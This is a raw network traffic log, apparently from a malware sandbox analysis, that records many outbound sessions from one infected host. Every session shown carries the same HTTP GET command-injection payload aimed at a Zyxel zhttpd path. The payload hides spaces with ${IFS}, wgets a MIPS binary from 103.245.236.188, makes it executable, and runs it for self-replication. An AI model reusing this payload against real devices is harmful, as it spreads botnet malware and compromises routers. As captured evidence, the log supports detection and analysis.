                                                Jan 12, 2024 18:16:18.338819981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3379192.168.2.233896840.166.242.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338848114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3380192.168.2.234145619.231.120.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338901997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3381192.168.2.2334160107.185.29.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338941097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3382192.168.2.23439661.13.203.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.338967085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3383192.168.2.235391893.45.131.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339013100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3384192.168.2.2352962169.88.74.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339056969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3385192.168.2.233494023.210.222.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339066982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3386192.168.2.2337476118.142.135.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339129925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3387192.168.2.235437070.189.134.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339170933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3388192.168.2.2356994158.83.132.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339202881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3389192.168.2.235709297.84.90.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339235067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3390192.168.2.2344138208.225.136.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339283943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3391192.168.2.2338768124.178.3.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.339297056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3392192.168.2.2351774100.226.229.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354638100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3393192.168.2.2341148189.119.146.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354674101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3394192.168.2.2345278206.201.67.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354724884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3395192.168.2.235698081.167.75.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354767084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3396192.168.2.235217887.111.31.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354820013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3397192.168.2.2335734168.129.228.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354855061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3398192.168.2.2338486217.140.192.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354881048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3399192.168.2.2334624188.40.129.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354912043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3400192.168.2.2354874181.37.248.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.354954958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3401192.168.2.2348020117.150.7.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355010986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3402192.168.2.2350142100.201.110.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355046034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3403192.168.2.235516264.215.161.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355076075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3404192.168.2.234436018.231.240.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355124950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3405192.168.2.235302236.116.185.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355179071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3406192.168.2.2343236104.58.136.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355227947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3407192.168.2.2336724162.21.183.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355249882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3408192.168.2.2339320176.28.238.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355304956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3409192.168.2.234198839.110.107.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355345964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3410192.168.2.2342020116.60.69.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355376959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3411192.168.2.233811083.129.140.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355401993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3412192.168.2.2354236107.145.111.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355433941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3413192.168.2.2360860150.163.24.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355469942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3414192.168.2.2352844177.200.218.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355504990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3415192.168.2.2338582115.207.29.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355525017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3416192.168.2.233918275.234.8.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355571985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3417192.168.2.2336300187.22.85.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355607033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3418192.168.2.233361853.35.229.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355637074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3419192.168.2.2344710201.14.158.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355665922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3420192.168.2.235148443.10.130.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355685949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3421192.168.2.2359078208.114.192.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355724096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3422192.168.2.2335512202.71.132.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355756998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3423192.168.2.2336942194.137.25.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355803967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3424192.168.2.2360582134.201.99.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355846882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3425192.168.2.2342894161.28.204.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355894089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3426192.168.2.2337890137.231.187.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355937004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3427192.168.2.2340288195.206.169.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.355987072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3428192.168.2.23498802.178.152.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356024027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3429192.168.2.2357200159.21.177.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356050968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3430192.168.2.234456025.235.196.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356084108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3431192.168.2.2344406184.187.246.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356122971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3432192.168.2.2354794185.255.224.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356169939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3433192.168.2.2341198101.70.171.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356209993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3434192.168.2.2342844137.44.64.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356230974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3435192.168.2.2334244185.128.31.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356301069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3436192.168.2.233576646.116.86.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356307030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3437192.168.2.2340480221.74.85.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356329918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3438192.168.2.2356408159.116.227.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356359005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3439192.168.2.2345506198.225.165.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356405020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3440192.168.2.234960889.156.216.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:19.356436968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3441192.168.2.2359164147.31.97.255443
                                                TimestampBytes transferredDirectionData
